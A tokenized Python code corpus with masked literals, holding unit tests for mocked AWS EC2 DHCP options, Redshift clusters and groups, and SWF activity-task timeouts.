'<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . tags [ '<STR_LIT:Name>' ] . should . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . tags [ '<STR_LIT>' ] . should . equal ( '<STR_LIT>' ) <EOL> filters = { '<STR_LIT>' : '<STR_LIT>' } <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( filters = filters ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:2> ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_get_by_id ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp1 = conn . create_dhcp_options ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> dhcp1 . add_tag ( '<STR_LIT:Name>' , '<STR_LIT>' ) <EOL> dhcp1 . add_tag ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp1_id = dhcp1 . id <EOL> dhcp2 = conn . create_dhcp_options ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> dhcp2 . add_tag ( '<STR_LIT:Name>' , '<STR_LIT>' ) <EOL> dhcp2 . add_tag ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp2_id = dhcp2 . id <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:2> ) <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( filters = { '<STR_LIT>' : dhcp1_id } ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:1> ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( filters = { '<STR_LIT>' : dhcp2_id } ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:1> ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_get_by_value_filter ( ) : <EOL> ec2 = boto3 . resource ( '<STR_LIT>' , region_name = '<STR_LIT>' ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> filters = [ { '<STR_LIT:Name>' : '<STR_LIT:value>' , '<STR_LIT>' : [ '<STR_LIT>' ] } ] <EOL> dhcp_options_sets = list ( ec2 . dhcp_options_sets . filter ( Filters = filters ) ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:1> ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_get_by_key_filter ( ) : <EOL> ec2 = boto3 . resource ( '<STR_LIT>' , region_name = '<STR_LIT>' ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> filters = [ { '<STR_LIT:Name>' : '<STR_LIT:key>' , '<STR_LIT>' : [ '<STR_LIT>' ] } ] <EOL> dhcp_options_sets = list ( ec2 . dhcp_options_sets . filter ( Filters = filters ) ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:3> ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_get_by_invalid_filter ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> conn . create_dhcp_options ( SAMPLE_DOMAIN_NAME , SAMPLE_NAME_SERVERS ) <EOL> filters = { '<STR_LIT>' : '<STR_LIT>' } <EOL> conn . get_all_dhcp_options . when . called_with ( filters = filters ) . should . throw ( NotImplementedError ) </s>
<s> from __future__ import unicode_literals <EOL> import boto <EOL> import sure <EOL> from moto import mock_ec2 <EOL> @ mock_ec2 <EOL> def test_windows ( ) : <EOL> pass </s>
<s> from __future__ import unicode_literals <EOL> import boto <EOL> from boto . redshift . exceptions import ( <EOL> ClusterNotFound , <EOL> ClusterParameterGroupNotFound , <EOL> ClusterSecurityGroupNotFound , <EOL> ClusterSubnetGroupNotFound , <EOL> InvalidSubnet , <EOL> ) <EOL> import sure <EOL> from moto import mock_ec2 , mock_redshift <EOL> @ mock_redshift <EOL> def test_create_cluster ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster ( <EOL> cluster_identifier , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> db_name = "<STR_LIT>" , <EOL> cluster_type = "<STR_LIT>" , <EOL> availability_zone = "<STR_LIT>" , <EOL> preferred_maintenance_window = "<STR_LIT>" , <EOL> automated_snapshot_retention_period = <NUM_LIT:10> , <EOL> port = <NUM_LIT> , <EOL> cluster_version = "<STR_LIT:1.0>" , <EOL> allow_version_upgrade = True , <EOL> number_of_nodes = <NUM_LIT:3> , <EOL> ) <EOL> cluster_response = conn . describe_clusters ( cluster_identifier ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( cluster_identifier ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT:username>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( [ ] ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( None ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:10> ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT> ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT:1.0>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( True ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:3> ) <EOL> @ mock_redshift <EOL> def test_create_single_node_cluster ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster ( <EOL> cluster_identifier , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> db_name = "<STR_LIT>" , <EOL> cluster_type = "<STR_LIT>" , <EOL> ) <EOL> cluster_response = conn . describe_clusters ( cluster_identifier ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( cluster_identifier ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT:username>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:1> ) <EOL> @ mock_redshift <EOL> def test_default_cluster_attibutes ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster ( <EOL> cluster_identifier , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> ) <EOL> cluster_response = conn . describe_clusters ( cluster_identifier ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( None ) <EOL> assert "<STR_LIT>" in cluster [ '<STR_LIT>' ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:1> ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT> ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT:1.0>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( True ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:1> ) <EOL> @ mock_redshift <EOL> @ mock_ec2 <EOL> def test_create_cluster_in_subnet_group ( ) : <EOL> vpc_conn = boto . connect_vpc ( ) <EOL> vpc = vpc_conn . create_vpc ( "<STR_LIT>" ) <EOL> subnet = vpc_conn . create_subnet ( vpc . id , "<STR_LIT>" ) <EOL> redshift_conn = boto . connect_redshift ( ) <EOL> redshift_conn . create_cluster_subnet_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> subnet_ids = [ subnet . id ] , <EOL> ) <EOL> redshift_conn . create_cluster ( <EOL> "<STR_LIT>" , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> cluster_subnet_group_name = '<STR_LIT>' , <EOL> ) <EOL> cluster_response = redshift_conn . describe_clusters ( "<STR_LIT>" ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( '<STR_LIT>' ) <EOL> @ mock_redshift <EOL> def test_create_cluster_with_security_group ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> conn . create_cluster_security_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> conn . create_cluster_security_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster ( <EOL> cluster_identifier , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> cluster_security_groups = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> ) <EOL> cluster_response = conn . describe_clusters ( cluster_identifier ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> group_names = [ group [ '<STR_LIT>' ] for group in cluster [ '<STR_LIT>' ] ] <EOL> set ( group_names ) . should . equal ( set ( [ "<STR_LIT>" , "<STR_LIT>" ] ) ) <EOL> @ mock_redshift <EOL> @ mock_ec2 <EOL> def test_create_cluster_with_vpc_security_groups ( ) : <EOL> vpc_conn = boto . connect_vpc ( ) <EOL> ec2_conn = boto . connect_ec2 ( ) <EOL> redshift_conn = boto . connect_redshift ( ) <EOL> vpc = vpc_conn . create_vpc ( "<STR_LIT>" ) <EOL> security_group = ec2_conn . create_security_group ( "<STR_LIT>" , "<STR_LIT>" , vpc_id = vpc . id ) <EOL> redshift_conn . create_cluster ( <EOL> "<STR_LIT>" , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> vpc_security_group_ids = [ security_group . id ] , <EOL> ) <EOL> cluster_response = redshift_conn . describe_clusters ( "<STR_LIT>" ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> group_ids = [ group [ '<STR_LIT>' ] for group in cluster [ '<STR_LIT>' ] ] <EOL> list ( group_ids ) . should . equal ( [ security_group . id ] ) <EOL> @ mock_redshift <EOL> def test_create_cluster_with_parameter_group ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> conn . create_cluster_parameter_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> conn . create_cluster ( <EOL> "<STR_LIT>" , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> cluster_parameter_group_name = '<STR_LIT>' , <EOL> ) <EOL> cluster_response = conn . describe_clusters ( "<STR_LIT>" ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> @ mock_redshift <EOL> def test_describe_non_existant_cluster ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> conn . describe_clusters . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterNotFound ) <EOL> @ mock_redshift <EOL> def test_delete_cluster ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster ( <EOL> cluster_identifier , <EOL> node_type = '<STR_LIT>' , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> ) <EOL> clusters = conn . describe_clusters ( ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> list ( clusters ) . should . have . length_of ( <NUM_LIT:1> ) <EOL> conn . delete_cluster ( cluster_identifier ) <EOL> clusters = conn . describe_clusters ( ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> list ( clusters ) . should . have . length_of ( <NUM_LIT:0> ) <EOL> conn . delete_cluster . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterNotFound ) <EOL> @ mock_redshift <EOL> def test_modify_cluster ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster_security_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> conn . create_cluster_parameter_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> conn . create_cluster ( <EOL> cluster_identifier , <EOL> node_type = '<STR_LIT>' , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> ) <EOL> conn . modify_cluster ( <EOL> cluster_identifier , <EOL> cluster_type = "<STR_LIT>" , <EOL> node_type = "<STR_LIT>" , <EOL> number_of_nodes = <NUM_LIT:2> , <EOL> cluster_security_groups = "<STR_LIT>" , <EOL> master_user_password = "<STR_LIT>" , <EOL> cluster_parameter_group_name = "<STR_LIT>" , <EOL> automated_snapshot_retention_period = <NUM_LIT:7> , <EOL> preferred_maintenance_window = "<STR_LIT>" , <EOL> allow_version_upgrade = False , <EOL> new_cluster_identifier = "<STR_LIT>" , <EOL> ) <EOL> cluster_response = conn . describe_clusters ( "<STR_LIT>" ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:7> ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( False ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:2> ) <EOL> @ mock_redshift <EOL> @ mock_ec2 <EOL> def test_create_cluster_subnet_group ( ) : <EOL> vpc_conn = boto . connect_vpc ( ) <EOL> vpc = vpc_conn . create_vpc ( "<STR_LIT>" ) <EOL> subnet1 = vpc_conn . create_subnet ( vpc . id , "<STR_LIT>" ) <EOL> subnet2 = vpc_conn . create_subnet ( vpc . id , "<STR_LIT>" ) <EOL> redshift_conn = boto . connect_redshift ( ) <EOL> redshift_conn . create_cluster_subnet_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> subnet_ids = [ subnet1 . id , subnet2 . id ] , <EOL> ) <EOL> subnets_response = redshift_conn . describe_cluster_subnet_groups ( "<STR_LIT>" ) <EOL> my_subnet = subnets_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> my_subnet [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> my_subnet [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> subnet_ids = [ subnet [ '<STR_LIT>' ] for subnet in my_subnet [ '<STR_LIT>' ] ] <EOL> set ( subnet_ids ) . should . equal ( set ( [ subnet1 . id , subnet2 . id ] ) ) <EOL> @ mock_redshift <EOL> @ mock_ec2 <EOL> def test_create_invalid_cluster_subnet_group ( ) : <EOL> redshift_conn = boto . connect_redshift ( ) <EOL> redshift_conn . create_cluster_subnet_group . when . called_with ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> subnet_ids = [ "<STR_LIT>" ] , <EOL> ) . should . throw ( InvalidSubnet ) <EOL> @ mock_redshift <EOL> def test_describe_non_existant_subnet_group ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> conn . describe_cluster_subnet_groups . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterSubnetGroupNotFound ) <EOL> @ mock_redshift <EOL> @ mock_ec2 <EOL> def test_delete_cluster_subnet_group ( ) : <EOL> vpc_conn = boto . connect_vpc ( ) <EOL> vpc = vpc_conn . create_vpc ( "<STR_LIT>" ) <EOL> subnet = vpc_conn . create_subnet ( vpc . id , "<STR_LIT>" ) <EOL> redshift_conn = boto . connect_redshift ( ) <EOL> redshift_conn . create_cluster_subnet_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> subnet_ids = [ subnet . id ] , <EOL> ) <EOL> subnets_response = redshift_conn . describe_cluster_subnet_groups ( ) <EOL> subnets = subnets_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> subnets . should . have . length_of ( <NUM_LIT:1> ) <EOL> redshift_conn . delete_cluster_subnet_group ( "<STR_LIT>" ) <EOL> subnets_response = redshift_conn . describe_cluster_subnet_groups ( ) <EOL> subnets = subnets_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> subnets . should . have . length_of ( <NUM_LIT:0> ) <EOL> redshift_conn . delete_cluster_subnet_group . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterSubnetGroupNotFound ) <EOL> @ mock_redshift <EOL> def test_create_cluster_security_group ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> conn . create_cluster_security_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> groups_response = conn . describe_cluster_security_groups ( "<STR_LIT>" ) <EOL> my_group = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> my_group [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> my_group [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> list ( my_group [ '<STR_LIT>' ] ) . should . equal ( [ ] ) <EOL> @ mock_redshift <EOL> def test_describe_non_existant_security_group ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> conn . describe_cluster_security_groups . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterSecurityGroupNotFound ) <EOL> @ mock_redshift <EOL> def test_delete_cluster_security_group ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> conn . create_cluster_security_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> groups_response = conn . describe_cluster_security_groups ( ) <EOL> groups = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> groups . should . have . length_of ( <NUM_LIT:2> ) <EOL> conn . delete_cluster_security_group ( "<STR_LIT>" ) <EOL> groups_response = conn . describe_cluster_security_groups ( ) <EOL> groups = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> groups . should . have . length_of ( <NUM_LIT:1> ) <EOL> conn . delete_cluster_security_group . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterSecurityGroupNotFound ) <EOL> @ mock_redshift <EOL> def test_create_cluster_parameter_group ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> conn . create_cluster_parameter_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> groups_response = conn . describe_cluster_parameter_groups ( "<STR_LIT>" ) <EOL> my_group = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> my_group [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> my_group [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> my_group [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> @ mock_redshift <EOL> def test_describe_non_existant_parameter_group ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> conn . describe_cluster_parameter_groups . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterParameterGroupNotFound ) <EOL> @ mock_redshift <EOL> def test_delete_cluster_parameter_group ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> conn . create_cluster_parameter_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> groups_response = conn . describe_cluster_parameter_groups ( ) <EOL> groups = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> groups . should . have . length_of ( <NUM_LIT:2> ) <EOL> conn . delete_cluster_parameter_group ( "<STR_LIT>" ) <EOL> groups_response = conn . describe_cluster_parameter_groups ( ) <EOL> groups = groups_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> groups . should . have . length_of ( <NUM_LIT:1> ) <EOL> conn . delete_cluster_parameter_group . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterParameterGroupNotFound ) </s>
<s> from freezegun import freeze_time <EOL> from moto . swf . exceptions import SWFWorkflowExecutionClosedError <EOL> from moto . swf . models import ( <EOL> ActivityTask , <EOL> ActivityType , <EOL> Timeout , <EOL> ) <EOL> from . . utils import ( <EOL> ACTIVITY_TASK_TIMEOUTS , <EOL> make_workflow_execution , <EOL> process_first_timeout , <EOL> ) <EOL> def test_activity_task_creation ( ) : <EOL> wfe = make_workflow_execution ( ) <EOL> task = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = "<STR_LIT:foo>" , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> workflow_execution = wfe , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> ) <EOL> task . workflow_execution . should . equal ( wfe ) <EOL> task . state . should . equal ( "<STR_LIT>" ) <EOL> task . task_token . should_not . be . empty <EOL> task . started_event_id . should . be . none <EOL> task . start ( <NUM_LIT> ) <EOL> task . state . should . equal ( "<STR_LIT>" ) <EOL> task . started_event_id . should . equal ( <NUM_LIT> ) <EOL> task . complete ( ) <EOL> task . state . should . equal ( "<STR_LIT>" ) <EOL> task . fail ( ) <EOL> task . state . should . equal ( "<STR_LIT>" ) <EOL> def test_activity_task_full_dict_representation ( ) : <EOL> wfe = make_workflow_execution ( ) <EOL> at = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = ActivityType ( "<STR_LIT:foo>" , "<STR_LIT>" ) , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> workflow_execution = wfe , <EOL> ) <EOL> at . start ( <NUM_LIT> ) <EOL> fd = at . to_full_dict ( ) <EOL> fd [ "<STR_LIT>" ] . should . equal ( "<STR_LIT>" ) <EOL> fd [ "<STR_LIT>" ] [ "<STR_LIT:version>" ] . should . equal ( "<STR_LIT>" ) <EOL> fd [ "<STR_LIT:input>" ] . should . equal ( "<STR_LIT>" ) <EOL> fd [ "<STR_LIT>" ] . should . equal ( <NUM_LIT> ) <EOL> fd . should . contain ( "<STR_LIT>" ) <EOL> fd [ "<STR_LIT>" ] . should . equal ( wfe . to_short_dict ( ) ) <EOL> at . start ( <NUM_LIT> ) <EOL> fd = at . to_full_dict ( ) <EOL> fd [ "<STR_LIT>" ] . should . equal ( <NUM_LIT> ) <EOL> def test_activity_task_reset_heartbeat_clock ( ) : <EOL> wfe = make_workflow_execution ( ) <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = "<STR_LIT:foo>" , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> workflow_execution = wfe , <EOL> ) <EOL> task . last_heartbeat_timestamp . should . equal ( <NUM_LIT> ) <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task . reset_heartbeat_clock ( ) <EOL> task . last_heartbeat_timestamp . should . equal ( <NUM_LIT> ) <EOL> def test_activity_task_first_timeout ( ) : <EOL> wfe = make_workflow_execution ( ) <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = "<STR_LIT:foo>" , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> workflow_execution = wfe , <EOL> ) <EOL> task . first_timeout ( ) . should . be . none <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task . first_timeout ( ) . should . be . a ( Timeout ) <EOL> process_first_timeout ( task ) <EOL> task . state . should . equal ( "<STR_LIT>" ) <EOL> task . timeout_type . should . equal ( "<STR_LIT>" ) <EOL> def test_activity_task_cannot_timeout_on_closed_workflow_execution ( ) : <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> wfe = make_workflow_execution ( ) <EOL> wfe . start ( ) <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = "<STR_LIT:foo>" , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> workflow_execution = wfe , <EOL> ) <EOL> with freeze_time ( "<STR_LIT>" ) : <EOL> task . first_timeout ( ) . should . be 